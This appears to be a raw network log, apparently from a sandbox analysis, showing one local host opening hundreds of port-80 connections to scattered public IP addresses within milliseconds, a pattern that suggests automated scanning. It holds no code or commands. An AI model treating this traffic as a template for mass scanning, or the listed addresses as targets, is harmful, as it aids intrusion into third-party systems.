                                                        Mar 21, 2024 05:21:47.386337042 CET4996880192.168.2.13213.31.47.14
                                                        Mar 21, 2024 05:21:47.386337042 CET4996880192.168.2.1386.175.29.236
                                                        Mar 21, 2024 05:21:47.386343956 CET4996880192.168.2.1382.83.187.147
                                                        Mar 21, 2024 05:21:47.386343956 CET4996880192.168.2.13169.179.175.128
                                                        Mar 21, 2024 05:21:47.386359930 CET4996880192.168.2.13169.25.253.47
                                                        Mar 21, 2024 05:21:47.386368990 CET4996880192.168.2.1380.146.144.143
                                                        Mar 21, 2024 05:21:47.386370897 CET4996880192.168.2.13181.78.80.42
                                                        Mar 21, 2024 05:21:47.386370897 CET4996880192.168.2.13169.158.53.254
                                                        Mar 21, 2024 05:21:47.386372089 CET4996880192.168.2.13178.132.21.66
                                                        Mar 21, 2024 05:21:47.386380911 CET4996880192.168.2.13181.44.177.161
                                                        Mar 21, 2024 05:21:47.386384964 CET4996880192.168.2.13181.217.240.209
                                                        Mar 21, 2024 05:21:47.386398077 CET4996880192.168.2.1386.76.126.14
                                                        Mar 21, 2024 05:21:47.386399984 CET4996880192.168.2.13200.156.165.55
                                                        Mar 21, 2024 05:21:47.386419058 CET4996880192.168.2.1386.30.223.212
                                                        Mar 21, 2024 05:21:47.386420012 CET4996880192.168.2.1383.110.221.204
                                                        Mar 21, 2024 05:21:47.386425972 CET4996880192.168.2.13169.213.46.42
                                                        Mar 21, 2024 05:21:47.386436939 CET4996880192.168.2.1386.125.132.212
                                                        Mar 21, 2024 05:21:47.386442900 CET4996880192.168.2.1380.171.112.55
                                                        Mar 21, 2024 05:21:47.386445999 CET4996880192.168.2.13213.167.244.199
                                                        Mar 21, 2024 05:21:47.386445999 CET4996880192.168.2.13206.38.239.253
                                                        Mar 21, 2024 05:21:47.386452913 CET4996880192.168.2.13206.25.130.119
                                                        Mar 21, 2024 05:21:47.386460066 CET4996880192.168.2.13169.55.233.236
                                                        Mar 21, 2024 05:21:47.386467934 CET4996880192.168.2.1383.71.145.15
                                                        Mar 21, 2024 05:21:47.386472940 CET4996880192.168.2.13206.92.115.108
                                                        Mar 21, 2024 05:21:47.386473894 CET4996880192.168.2.1380.132.72.98
                                                        Mar 21, 2024 05:21:47.386476994 CET4996880192.168.2.13213.48.153.95
                                                        Mar 21, 2024 05:21:47.386495113 CET4996880192.168.2.13169.132.137.251
                                                        Mar 21, 2024 05:21:47.386498928 CET4996880192.168.2.13178.4.87.54
                                                        Mar 21, 2024 05:21:47.386508942 CET4996880192.168.2.13181.161.140.89
                                                        Mar 21, 2024 05:21:47.386511087 CET4996880192.168.2.1382.19.73.78
                                                        Mar 21, 2024 05:21:47.386513948 CET4996880192.168.2.1382.213.143.88
                                                        Mar 21, 2024 05:21:47.386524916 CET4996880192.168.2.13169.248.0.102
                                                        Mar 21, 2024 05:21:47.386527061 CET4996880192.168.2.13200.32.145.208
                                                        Mar 21, 2024 05:21:47.386538982 CET4996880192.168.2.13200.249.174.20
                                                        Mar 21, 2024 05:21:47.386542082 CET4996880192.168.2.13181.167.8.63
                                                        Mar 21, 2024 05:21:47.386548996 CET4996880192.168.2.13213.98.232.107
                                                        Mar 21, 2024 05:21:47.386548996 CET4996880192.168.2.13200.46.78.5
                                                        Mar 21, 2024 05:21:47.386557102 CET4996880192.168.2.13169.149.175.98
                                                        Mar 21, 2024 05:21:47.386563063 CET4996880192.168.2.13206.155.28.77
                                                        Mar 21, 2024 05:21:47.386585951 CET4996880192.168.2.13181.240.175.163
                                                        Mar 21, 2024 05:21:47.386596918 CET4996880192.168.2.1383.22.98.111
                                                        Mar 21, 2024 05:21:47.386596918 CET4996880192.168.2.13206.33.85.29
                                                        Mar 21, 2024 05:21:47.386601925 CET4996880192.168.2.13181.158.250.83
                                                        Mar 21, 2024 05:21:47.386619091 CET4996880192.168.2.1382.176.53.11
                                                        Mar 21, 2024 05:21:47.386619091 CET4996880192.168.2.1383.60.197.4
                                                        Mar 21, 2024 05:21:47.386650085 CET4996880192.168.2.13178.19.141.211
                                                        Mar 21, 2024 05:21:47.386650085 CET4996880192.168.2.13178.82.86.140
                                                        Mar 21, 2024 05:21:47.386655092 CET4996880192.168.2.13178.173.111.82
                                                        Mar 21, 2024 05:21:47.386665106 CET4996880192.168.2.13181.87.219.182
                                                        Mar 21, 2024 05:21:47.386665106 CET4996880192.168.2.13206.115.16.145
                                                        Mar 21, 2024 05:21:47.386668921 CET4996880192.168.2.13178.194.254.118
                                                        Mar 21, 2024 05:21:47.386676073 CET4996880192.168.2.1382.105.199.39
                                                        Mar 21, 2024 05:21:47.386698008 CET4996880192.168.2.13181.10.112.147
                                                        Mar 21, 2024 05:21:47.386702061 CET4996880192.168.2.1382.178.171.31
                                                        Mar 21, 2024 05:21:47.386703968 CET4996880192.168.2.13213.62.143.176
                                                        Mar 21, 2024 05:21:47.386717081 CET4996880192.168.2.13206.99.174.193
                                                        Mar 21, 2024 05:21:47.386725903 CET4996880192.168.2.1380.101.212.70
                                                        Mar 21, 2024 05:21:47.386725903 CET4996880192.168.2.13169.63.215.72
                                                        Mar 21, 2024 05:21:47.386735916 CET4996880192.168.2.1382.173.159.81
                                                        Mar 21, 2024 05:21:47.386743069 CET4996880192.168.2.13206.165.73.120
                                                        Mar 21, 2024 05:21:47.386743069 CET4996880192.168.2.1382.74.174.207
                                                        Mar 21, 2024 05:21:47.386743069 CET4996880192.168.2.1383.183.141.242
                                                        Mar 21, 2024 05:21:47.386754036 CET4996880192.168.2.13181.212.110.253
                                                        Mar 21, 2024 05:21:47.386756897 CET4996880192.168.2.13213.62.78.136
                                                        Mar 21, 2024 05:21:47.386758089 CET4996880192.168.2.1382.190.74.108
                                                        Mar 21, 2024 05:21:47.386759043 CET4996880192.168.2.13178.196.43.77
                                                        Mar 21, 2024 05:21:47.386759043 CET4996880192.168.2.13181.166.107.71
                                                        Mar 21, 2024 05:21:47.386766911 CET4996880192.168.2.1380.61.179.190
                                                        Mar 21, 2024 05:21:47.386766911 CET4996880192.168.2.13178.109.239.105
                                                        Mar 21, 2024 05:21:47.386776924 CET4996880192.168.2.1382.204.241.154
                                                        Mar 21, 2024 05:21:47.386776924 CET4996880192.168.2.13206.193.89.146
                                                        Mar 21, 2024 05:21:47.386780977 CET4996880192.168.2.13169.203.206.121
                                                        Mar 21, 2024 05:21:47.386790991 CET4996880192.168.2.13181.206.61.194
                                                        Mar 21, 2024 05:21:47.386809111 CET4996880192.168.2.13178.102.43.201
                                                        Mar 21, 2024 05:21:47.386816025 CET4996880192.168.2.1386.222.78.155
                                                        Mar 21, 2024 05:21:47.386832952 CET4996880192.168.2.13206.150.212.219
                                                        Mar 21, 2024 05:21:47.386836052 CET4996880192.168.2.13206.221.90.85
                                                        Mar 21, 2024 05:21:47.386841059 CET4996880192.168.2.13213.79.179.63
                                                        Mar 21, 2024 05:21:47.386848927 CET4996880192.168.2.13178.113.68.138
                                                        Mar 21, 2024 05:21:47.386851072 CET4996880192.168.2.13181.208.228.72
                                                        Mar 21, 2024 05:21:47.386851072 CET4996880192.168.2.1380.138.188.219
                                                        Mar 21, 2024 05:21:47.386859894 CET4996880192.168.2.1386.250.192.236
                                                        Mar 21, 2024 05:21:47.386868000 CET4996880192.168.2.13169.184.214.246
                                                        Mar 21, 2024 05:21:47.386877060 CET4996880192.168.2.1386.62.146.153
                                                        Mar 21, 2024 05:21:47.386878014 CET4996880192.168.2.1386.76.32.60
                                                        Mar 21, 2024 05:21:47.386887074 CET4996880192.168.2.1380.194.234.88
                                                        Mar 21, 2024 05:21:47.386909008 CET4996880192.168.2.13181.177.146.172
                                                        Mar 21, 2024 05:21:47.386909962 CET4996880192.168.2.1383.58.105.105
                                                        Mar 21, 2024 05:21:47.386917114 CET4996880192.168.2.1380.16.105.139
                                                        Mar 21, 2024 05:21:47.386928082 CET4996880192.168.2.13181.219.147.23
                                                        Mar 21, 2024 05:21:47.386934996 CET4996880192.168.2.1380.180.160.251
                                                        Mar 21, 2024 05:21:47.386949062 CET4996880192.168.2.1380.25.124.216
                                                        Mar 21, 2024 05:21:47.386954069 CET4996880192.168.2.13181.29.215.93
                                                        Mar 21, 2024 05:21:47.386956930 CET4996880192.168.2.1380.202.132.203
                                                        Mar 21, 2024 05:21:47.386982918 CET4996880192.168.2.13213.71.251.2
                                                        Mar 21, 2024 05:21:47.386982918 CET4996880192.168.2.13181.73.226.244
                                                        Mar 21, 2024 05:21:47.386985064 CET4996880192.168.2.1380.46.114.207
                                                        Mar 21, 2024 05:21:47.386992931 CET4996880192.168.2.13169.248.236.136
                                                        Mar 21, 2024 05:21:47.387000084 CET4996880192.168.2.1383.42.145.96
                                                        Mar 21, 2024 05:21:47.387001991 CET4996880192.168.2.13169.169.223.195
                                                        Mar 21, 2024 05:21:47.387001991 CET4996880192.168.2.1382.104.255.28
                                                        Mar 21, 2024 05:21:47.387008905 CET4996880192.168.2.13213.133.142.240
                                                        Mar 21, 2024 05:21:47.387010098 CET4996880192.168.2.13200.31.150.97
                                                        Mar 21, 2024 05:21:47.387010098 CET4996880192.168.2.1380.74.98.253
                                                        Mar 21, 2024 05:21:47.387017012 CET4996880192.168.2.13200.60.190.5
                                                        Mar 21, 2024 05:21:47.387023926 CET4996880192.168.2.1380.46.159.21
                                                        Mar 21, 2024 05:21:47.387029886 CET4996880192.168.2.1386.90.194.24
                                                        Mar 21, 2024 05:21:47.387038946 CET4996880192.168.2.13200.181.46.109
                                                        Mar 21, 2024 05:21:47.387048006 CET4996880192.168.2.13206.159.206.189
                                                        Mar 21, 2024 05:21:47.387048960 CET4996880192.168.2.13213.98.129.140
                                                        Mar 21, 2024 05:21:47.387056112 CET4996880192.168.2.1382.98.40.0
                                                        Mar 21, 2024 05:21:47.387057066 CET4996880192.168.2.1382.210.10.15
                                                        Mar 21, 2024 05:21:47.387063980 CET4996880192.168.2.13169.121.217.45
                                                        Mar 21, 2024 05:21:47.387075901 CET4996880192.168.2.13169.74.116.228
                                                        Mar 21, 2024 05:21:47.387075901 CET4996880192.168.2.1386.219.147.195
                                                        Mar 21, 2024 05:21:47.387079954 CET4996880192.168.2.1386.192.9.227
                                                        Mar 21, 2024 05:21:47.387089968 CET4996880192.168.2.13206.38.34.146
                                                        Mar 21, 2024 05:21:47.387099028 CET4996880192.168.2.1380.223.93.33
                                                        Mar 21, 2024 05:21:47.387099028 CET4996880192.168.2.13181.19.170.148
                                                        Mar 21, 2024 05:21:47.387099028 CET4996880192.168.2.1383.154.237.98
                                                        Mar 21, 2024 05:21:47.387115955 CET4996880192.168.2.13213.66.160.176
                                                        Mar 21, 2024 05:21:47.387115955 CET4996880192.168.2.13200.255.251.182
                                                        Mar 21, 2024 05:21:47.387129068 CET4996880192.168.2.13200.105.153.222
                                                        Mar 21, 2024 05:21:47.387129068 CET4996880192.168.2.13178.37.123.68
                                                        Mar 21, 2024 05:21:47.387150049 CET4996880192.168.2.13206.12.124.206
                                                        Mar 21, 2024 05:21:47.387150049 CET4996880192.168.2.13181.82.105.214
                                                        Mar 21, 2024 05:21:47.387152910 CET4996880192.168.2.13206.140.191.174
                                                        Mar 21, 2024 05:21:47.387152910 CET4996880192.168.2.13181.245.63.119
                                                        Mar 21, 2024 05:21:47.387152910 CET4996880192.168.2.13213.180.107.14
                                                        Mar 21, 2024 05:21:47.387167931 CET4996880192.168.2.13181.214.77.26
                                                        Mar 21, 2024 05:21:47.387176991 CET4996880192.168.2.13169.236.35.39
                                                        Mar 21, 2024 05:21:47.387182951 CET4996880192.168.2.1380.143.147.74
                                                        Mar 21, 2024 05:21:47.387182951 CET4996880192.168.2.13200.13.232.54
                                                        Mar 21, 2024 05:21:47.387190104 CET4996880192.168.2.13169.105.206.13
                                                        Mar 21, 2024 05:21:47.387197971 CET4996880192.168.2.1382.32.230.114
                                                        Mar 21, 2024 05:21:47.387204885 CET4996880192.168.2.1383.250.255.190
                                                        Mar 21, 2024 05:21:47.387217045 CET4996880192.168.2.13206.98.157.193
                                                        Mar 21, 2024 05:21:47.387234926 CET4996880192.168.2.13178.150.167.111
                                                        Mar 21, 2024 05:21:47.387234926 CET4996880192.168.2.13213.42.8.152
                                                        Mar 21, 2024 05:21:47.387242079 CET4996880192.168.2.1380.143.62.173
                                                        Mar 21, 2024 05:21:47.387250900 CET4996880192.168.2.1383.121.74.218
                                                        Mar 21, 2024 05:21:47.387252092 CET4996880192.168.2.13213.74.196.217
                                                        Mar 21, 2024 05:21:47.387254953 CET4996880192.168.2.1380.167.69.20
                                                        Mar 21, 2024 05:21:47.387263060 CET4996880192.168.2.1383.37.241.144
                                                        Mar 21, 2024 05:21:47.387263060 CET4996880192.168.2.1383.10.106.81
                                                        Mar 21, 2024 05:21:47.387279987 CET4996880192.168.2.1382.214.181.62
                                                        Mar 21, 2024 05:21:47.387281895 CET4996880192.168.2.13213.163.71.245
                                                        Mar 21, 2024 05:21:47.387281895 CET4996880192.168.2.13206.175.191.198
                                                        Mar 21, 2024 05:21:47.387281895 CET4996880192.168.2.1382.210.43.130
                                                        Mar 21, 2024 05:21:47.387286901 CET4996880192.168.2.1383.210.157.181
                                                        Mar 21, 2024 05:21:47.387293100 CET4996880192.168.2.1386.35.216.33
                                                        Mar 21, 2024 05:21:47.387295961 CET4996880192.168.2.1386.218.62.195
                                                        Mar 21, 2024 05:21:47.387300968 CET4996880192.168.2.13178.39.63.83
                                                        Mar 21, 2024 05:21:47.387300968 CET4996880192.168.2.13181.248.108.232
                                                        Mar 21, 2024 05:21:47.387309074 CET4996880192.168.2.13169.116.195.200
                                                        Mar 21, 2024 05:21:47.387322903 CET4996880192.168.2.13178.248.169.17
                                                        Mar 21, 2024 05:21:47.387322903 CET4996880192.168.2.13213.164.102.44
                                                        Mar 21, 2024 05:21:47.387322903 CET4996880192.168.2.13200.42.57.4
                                                        Mar 21, 2024 05:21:47.387332916 CET4996880192.168.2.13200.19.30.188
                                                        Mar 21, 2024 05:21:47.387335062 CET4996880192.168.2.13178.138.30.114
                                                        Mar 21, 2024 05:21:47.387347937 CET4996880192.168.2.13213.7.161.112
                                                        Mar 21, 2024 05:21:47.387350082 CET4996880192.168.2.1386.114.120.104
                                                        Mar 21, 2024 05:21:47.387350082 CET4996880192.168.2.13178.195.250.186
                                                        Mar 21, 2024 05:21:47.387352943 CET4996880192.168.2.13178.154.153.113
                                                        Mar 21, 2024 05:21:47.387362003 CET4996880192.168.2.13213.158.45.72
                                                        Mar 21, 2024 05:21:47.387363911 CET4996880192.168.2.13178.119.19.89
                                                        Mar 21, 2024 05:21:47.387379885 CET4996880192.168.2.13206.71.42.74
                                                        Mar 21, 2024 05:21:47.387382030 CET5048080192.168.2.13178.255.113.107
                                                        Mar 21, 2024 05:21:47.387384892 CET5048080192.168.2.13178.67.87.105
                                                        Mar 21, 2024 05:21:47.387384892 CET5048080192.168.2.13178.29.239.105
                                                        Mar 21, 2024 05:21:47.387407064 CET4996880192.168.2.1382.62.248.134
                                                        Mar 21, 2024 05:21:47.387408972 CET4996880192.168.2.1383.115.210.81
                                                        Mar 21, 2024 05:21:47.387413979 CET4996880192.168.2.13181.16.238.29
                                                        Mar 21, 2024 05:21:47.387413979 CET4996880192.168.2.1386.244.139.236
                                                        Mar 21, 2024 05:21:47.387413979 CET5048080192.168.2.13178.31.134.119
                                                        Mar 21, 2024 05:21:47.387423038 CET5048080192.168.2.13178.126.114.225
                                                        Mar 21, 2024 05:21:47.387423038 CET5048080192.168.2.13178.97.154.196
                                                        Mar 21, 2024 05:21:47.387423992 CET5048080192.168.2.13178.174.243.66
                                                        Mar 21, 2024 05:21:47.387425900 CET5048080192.168.2.13178.204.7.236
                                                        Mar 21, 2024 05:21:47.387439013 CET5048080192.168.2.13178.42.87.52
                                                        Mar 21, 2024 05:21:47.387439013 CET4996880192.168.2.13169.253.102.94
                                                        Mar 21, 2024 05:21:47.387444019 CET4996880192.168.2.13206.222.24.66
                                                        Mar 21, 2024 05:21:47.387444019 CET4996880192.168.2.1383.158.64.184
                                                        Mar 21, 2024 05:21:47.387449980 CET4996880192.168.2.13213.111.148.242
                                                        Mar 21, 2024 05:21:47.387449980 CET4996880192.168.2.13181.235.208.143
                                                        Mar 21, 2024 05:21:47.387451887 CET5048080192.168.2.13178.41.1.77
                                                        Mar 21, 2024 05:21:47.387451887 CET4996880192.168.2.13200.71.15.161
                                                        Mar 21, 2024 05:21:47.387454033 CET4996880192.168.2.1386.46.59.110
                                                        Mar 21, 2024 05:21:47.387454033 CET4996880192.168.2.13181.133.235.17
                                                        Mar 21, 2024 05:21:47.387463093 CET4996880192.168.2.13178.130.211.154
                                                        Mar 21, 2024 05:21:47.387475967 CET4996880192.168.2.13178.179.136.109
                                                        Mar 21, 2024 05:21:47.387475967 CET4996880192.168.2.1380.73.15.2
                                                        Mar 21, 2024 05:21:47.387475967 CET5048080192.168.2.13178.133.156.58
                                                        Mar 21, 2024 05:21:47.387475967 CET5048080192.168.2.13178.86.101.67
                                                        Mar 21, 2024 05:21:47.387490988 CET4996880192.168.2.1382.90.194.196
                                                        Mar 21, 2024 05:21:47.387492895 CET4996880192.168.2.1383.47.230.195
                                                        Mar 21, 2024 05:21:47.387492895 CET5048080192.168.2.13178.22.168.98
                                                        Mar 21, 2024 05:21:47.387494087 CET4996880192.168.2.13178.224.90.71
                                                        Mar 21, 2024 05:21:47.387494087 CET5048080192.168.2.13178.72.214.14
                                                        Mar 21, 2024 05:21:47.387505054 CET5048080192.168.2.13178.160.36.201
                                                        Mar 21, 2024 05:21:47.387505054 CET5048080192.168.2.13178.247.128.47
                                                        Mar 21, 2024 05:21:47.387510061 CET5048080192.168.2.13178.215.199.208
                                                        Mar 21, 2024 05:21:47.387511969 CET5048080192.168.2.13178.48.162.156
                                                        Mar 21, 2024 05:21:47.387511969 CET4996880192.168.2.1380.187.39.48
                                                        Mar 21, 2024 05:21:47.387526035 CET5048080192.168.2.13178.133.242.43
                                                        Mar 21, 2024 05:21:47.387527943 CET4996880192.168.2.13169.89.31.21
                                                        Mar 21, 2024 05:21:47.387527943 CET4996880192.168.2.1382.118.29.148
                                                        Mar 21, 2024 05:21:47.387527943 CET4996880192.168.2.13181.191.209.56
                                                        Mar 21, 2024 05:21:47.387530088 CET5048080192.168.2.13178.182.217.53
                                                        Mar 21, 2024 05:21:47.387531996 CET4996880192.168.2.13200.148.99.140
                                                        Mar 21, 2024 05:21:47.387535095 CET4996880192.168.2.13178.195.150.210
                                                        Mar 21, 2024 05:21:47.387535095 CET5048080192.168.2.13178.249.203.173
                                                        Mar 21, 2024 05:21:47.387537003 CET5048080192.168.2.13178.50.73.49
                                                        Mar 21, 2024 05:21:47.387541056 CET4996880192.168.2.1383.220.0.63
                                                        Mar 21, 2024 05:21:47.387548923 CET5048080192.168.2.13178.251.126.93
                                                        Mar 21, 2024 05:21:47.387550116 CET4996880192.168.2.13169.196.55.160
                                                        Mar 21, 2024 05:21:47.387548923 CET4996880192.168.2.13169.1.149.111
                                                        Mar 21, 2024 05:21:47.387550116 CET4996880192.168.2.13213.244.37.35
                                                        Mar 21, 2024 05:21:47.387553930 CET5048080192.168.2.13178.218.123.32
                                                        Mar 21, 2024 05:21:47.387559891 CET5048080192.168.2.13178.165.124.210
                                                        Mar 21, 2024 05:21:47.387559891 CET5048080192.168.2.13178.161.200.151
                                                        Mar 21, 2024 05:21:47.387561083 CET4996880192.168.2.1382.45.110.72
                                                        Mar 21, 2024 05:21:47.387559891 CET4996880192.168.2.1380.246.171.30
                                                        Mar 21, 2024 05:21:47.387561083 CET5048080192.168.2.13178.92.109.241
                                                        Mar 21, 2024 05:21:47.387567043 CET4996880192.168.2.13178.57.16.186
                                                        Mar 21, 2024 05:21:47.387567043 CET5048080192.168.2.13178.36.187.1
                                                        Mar 21, 2024 05:21:47.387579918 CET5048080192.168.2.13178.247.87.118
                                                        Mar 21, 2024 05:21:47.387579918 CET4996880192.168.2.1383.174.220.246
                                                        Mar 21, 2024 05:21:47.387588978 CET5048080192.168.2.13178.87.252.105
                                                        Mar 21, 2024 05:21:47.387599945 CET4996880192.168.2.1380.212.23.193
                                                        Mar 21, 2024 05:21:47.387599945 CET4996880192.168.2.1383.23.43.104
                                                        Mar 21, 2024 05:21:47.387602091 CET4996880192.168.2.13206.65.152.124
                                                        Mar 21, 2024 05:21:47.387607098 CET4996880192.168.2.13169.124.92.247
                                                        Mar 21, 2024 05:21:47.387612104 CET4996880192.168.2.13178.225.37.13
                                                        Mar 21, 2024 05:21:47.387602091 CET4996880192.168.2.13213.191.131.237
                                                        Mar 21, 2024 05:21:47.387612104 CET4996880192.168.2.1383.252.11.208
                                                        Mar 21, 2024 05:21:47.387602091 CET4996880192.168.2.1380.27.91.158
                                                        Mar 21, 2024 05:21:47.387602091 CET4996880192.168.2.1382.112.185.165
                                                        Mar 21, 2024 05:21:47.387626886 CET4996880192.168.2.1383.139.168.104
                                                        Mar 21, 2024 05:21:47.387631893 CET5048080192.168.2.13178.156.250.7
                                                        Mar 21, 2024 05:21:47.387631893 CET4996880192.168.2.13206.171.115.181
                                                        Mar 21, 2024 05:21:47.387631893 CET5048080192.168.2.13178.158.116.243
                                                        Mar 21, 2024 05:21:47.387631893 CET4996880192.168.2.13206.230.14.39
                                                        Mar 21, 2024 05:21:47.387634993 CET4996880192.168.2.13178.208.177.248
                                                        Mar 21, 2024 05:21:47.387634993 CET5048080192.168.2.13178.80.18.114
                                                        Mar 21, 2024 05:21:47.387640953 CET5048080192.168.2.13178.192.34.31
                                                        Mar 21, 2024 05:21:47.387640953 CET5048080192.168.2.13178.232.252.225
                                                        Mar 21, 2024 05:21:47.387641907 CET4996880192.168.2.13169.226.231.211
                                                        Mar 21, 2024 05:21:47.387641907 CET4996880192.168.2.13181.102.183.123
                                                        Mar 21, 2024 05:21:47.387641907 CET5048080192.168.2.13178.231.26.17
                                                        Mar 21, 2024 05:21:47.387648106 CET5048080192.168.2.13178.159.252.221
                                                        Mar 21, 2024 05:21:47.387650967 CET4996880192.168.2.13200.185.30.161
                                                        Mar 21, 2024 05:21:47.387650967 CET4996880192.168.2.13178.53.154.80
                                                        Mar 21, 2024 05:21:47.387659073 CET5048080192.168.2.13178.105.129.178
                                                        Mar 21, 2024 05:21:47.387660980 CET5048080192.168.2.13178.107.49.114
                                                        Mar 21, 2024 05:21:47.387661934 CET4996880192.168.2.13200.172.190.68
                                                        Mar 21, 2024 05:21:47.387661934 CET5048080192.168.2.13178.196.133.216
                                                        Mar 21, 2024 05:21:47.387665033 CET5048080192.168.2.13178.171.33.175
                                                        Mar 21, 2024 05:21:47.387670040 CET5048080192.168.2.13178.164.190.103
                                                        Mar 21, 2024 05:21:47.387670040 CET4996880192.168.2.13181.144.50.125
                                                        Mar 21, 2024 05:21:47.387685061 CET5048080192.168.2.13178.56.108.169
                                                        Mar 21, 2024 05:21:47.387687922 CET5048080192.168.2.13178.235.99.110
                                                        Mar 21, 2024 05:21:47.387690067 CET4996880192.168.2.13200.77.209.151
                                                        Mar 21, 2024 05:21:47.387690067 CET4996880192.168.2.1380.56.237.73
                                                        Mar 21, 2024 05:21:47.387691021 CET5048080192.168.2.13178.35.156.207
                                                        Mar 21, 2024 05:21:47.387692928 CET5048080192.168.2.13178.226.34.0
                                                        Mar 21, 2024 05:21:47.387701035 CET5048080192.168.2.13178.16.188.7
                                                        Mar 21, 2024 05:21:47.387701035 CET5048080192.168.2.13178.68.74.112
                                                        Mar 21, 2024 05:21:47.387711048 CET5048080192.168.2.13178.2.67.122
                                                        Mar 21, 2024 05:21:47.387715101 CET4996880192.168.2.1383.115.168.74
                                                        Mar 21, 2024 05:21:47.387722015 CET5048080192.168.2.13178.79.146.99
                                                        Mar 21, 2024 05:21:47.387722015 CET5048080192.168.2.13178.61.83.29
                                                        Mar 21, 2024 05:21:47.387725115 CET5048080192.168.2.13178.70.104.93
                                                        Mar 21, 2024 05:21:47.387725115 CET5048080192.168.2.13178.247.147.223
                                                        Mar 21, 2024 05:21:47.387726068 CET5048080192.168.2.13178.34.125.7
                                                        Mar 21, 2024 05:21:47.387728930 CET5048080192.168.2.13178.164.184.220
                                                        Mar 21, 2024 05:21:47.387731075 CET4996880192.168.2.13169.128.119.98
                                                        Mar 21, 2024 05:21:47.387731075 CET4996880192.168.2.13200.89.92.72
                                                        Mar 21, 2024 05:21:47.387753963 CET4996880192.168.2.1380.250.93.149
                                                        Mar 21, 2024 05:21:47.387756109 CET4996880192.168.2.1382.148.124.88
                                                        Mar 21, 2024 05:21:47.387756109 CET4996880192.168.2.1383.60.242.52
                                                        Mar 21, 2024 05:21:47.387757063 CET4996880192.168.2.13169.211.82.197
                                                        Mar 21, 2024 05:21:47.387764931 CET4996880192.168.2.1386.228.129.93
                                                        Mar 21, 2024 05:21:47.387775898 CET5048080192.168.2.13178.52.70.70
                                                        Mar 21, 2024 05:21:47.387775898 CET4996880192.168.2.1386.74.139.231
                                                        Mar 21, 2024 05:21:47.387777090 CET4996880192.168.2.13206.95.87.177
                                                        Mar 21, 2024 05:21:47.387780905 CET5048080192.168.2.13178.34.213.189
                                                        Mar 21, 2024 05:21:47.387780905 CET4996880192.168.2.1380.253.43.106
                                                        Mar 21, 2024 05:21:47.387783051 CET5048080192.168.2.13178.191.105.96
                                                        Mar 21, 2024 05:21:47.387783051 CET4996880192.168.2.13200.67.195.122
                                                        Mar 21, 2024 05:21:47.387787104 CET5048080192.168.2.13178.232.203.107
                                                        Mar 21, 2024 05:21:47.387800932 CET5048080192.168.2.13178.53.170.231
                                                        Mar 21, 2024 05:21:47.387810946 CET4996880192.168.2.13213.63.16.169
                                                        Mar 21, 2024 05:21:47.387811899 CET4996880192.168.2.13169.217.2.199
                                                        Mar 21, 2024 05:21:47.387821913 CET5048080192.168.2.13178.214.0.206
                                                        Mar 21, 2024 05:21:47.387826920 CET5048080192.168.2.13178.56.169.24
                                                        Mar 21, 2024 05:21:47.387826920 CET4996880192.168.2.1386.26.114.239
                                                        Mar 21, 2024 05:21:47.387840986 CET4996880192.168.2.13169.52.148.159
                                                        Mar 21, 2024 05:21:47.387844086 CET5048080192.168.2.13178.176.21.145
                                                        Mar 21, 2024 05:21:47.387846947 CET5048080192.168.2.13178.121.195.7
                                                        Mar 21, 2024 05:21:47.387846947 CET5048080192.168.2.13178.20.33.51
                                                        Mar 21, 2024 05:21:47.387860060 CET5048080192.168.2.13178.153.107.145
                                                        Mar 21, 2024 05:21:47.387860060 CET5048080192.168.2.13178.94.18.227
                                                        Mar 21, 2024 05:21:47.387861967 CET5048080192.168.2.13178.33.69.63
                                                        Mar 21, 2024 05:21:47.387861967 CET4996880192.168.2.13178.64.130.20
                                                        Mar 21, 2024 05:21:47.387862921 CET5048080192.168.2.13178.145.32.159
                                                        Mar 21, 2024 05:21:47.387875080 CET5048080192.168.2.13178.170.72.26
                                                        Mar 21, 2024 05:21:47.387878895 CET4996880192.168.2.1386.29.42.124
                                                        Mar 21, 2024 05:21:47.387880087 CET4996880192.168.2.13181.208.237.255
                                                        Mar 21, 2024 05:21:47.387881041 CET4996880192.168.2.13213.135.20.166
                                                        Mar 21, 2024 05:21:47.387886047 CET4996880192.168.2.1382.86.121.19
                                                        Mar 21, 2024 05:21:47.387897015 CET4996880192.168.2.13169.222.174.168
                                                        Mar 21, 2024 05:21:47.387913942 CET5048080192.168.2.13178.135.0.55
                                                        Mar 21, 2024 05:21:47.387913942 CET5048080192.168.2.13178.136.165.41
                                                        Mar 21, 2024 05:21:47.387916088 CET5048080192.168.2.13178.2.138.181
                                                        Mar 21, 2024 05:21:47.387916088 CET4996880192.168.2.13178.190.224.241
                                                        Mar 21, 2024 05:21:47.387919903 CET5048080192.168.2.13178.10.54.195
                                                        Mar 21, 2024 05:21:47.387919903 CET5048080192.168.2.13178.80.196.200
                                                        Mar 21, 2024 05:21:47.387923002 CET5048080192.168.2.13178.43.254.198
                                                        Mar 21, 2024 05:21:47.387918949 CET5048080192.168.2.13178.184.125.100
                                                        Mar 21, 2024 05:21:47.387927055 CET4996880192.168.2.13181.40.247.242
                                                        Mar 21, 2024 05:21:47.387928009 CET5048080192.168.2.13178.125.15.196
                                                        Mar 21, 2024 05:21:47.387928009 CET4996880192.168.2.13169.184.68.1
                                                        Mar 21, 2024 05:21:47.387939930 CET4996880192.168.2.13169.22.174.8
                                                        Mar 21, 2024 05:21:47.387942076 CET4996880192.168.2.13178.100.123.151
                                                        Mar 21, 2024 05:21:47.387943029 CET5048080192.168.2.13178.212.10.225
                                                        Mar 21, 2024 05:21:47.387945890 CET4996880192.168.2.13213.184.205.18
                                                        Mar 21, 2024 05:21:47.387947083 CET4996880192.168.2.13206.198.45.27
                                                        Mar 21, 2024 05:21:47.387963057 CET5048080192.168.2.13178.156.231.231
                                                        Mar 21, 2024 05:21:47.387964010 CET5048080192.168.2.13178.214.242.110
                                                        Mar 21, 2024 05:21:47.387968063 CET4996880192.168.2.13181.46.19.6
                                                        Mar 21, 2024 05:21:47.387969017 CET4996880192.168.2.1386.214.102.220
                                                        Mar 21, 2024 05:21:47.387969017 CET5048080192.168.2.13178.163.97.242
                                                        Mar 21, 2024 05:21:47.387972116 CET4996880192.168.2.13213.68.239.69
                                                        Mar 21, 2024 05:21:47.387976885 CET4996880192.168.2.1386.10.25.117
                                                        Mar 21, 2024 05:21:47.387988091 CET5048080192.168.2.13178.238.189.227
                                                        Mar 21, 2024 05:21:47.387988091 CET5048080192.168.2.13178.21.137.205
                                                        Mar 21, 2024 05:21:47.387991905 CET5048080192.168.2.13178.30.134.148
                                                        Mar 21, 2024 05:21:47.387991905 CET5048080192.168.2.13178.167.11.9
                                                        Mar 21, 2024 05:21:47.387994051 CET5048080192.168.2.13178.159.17.56
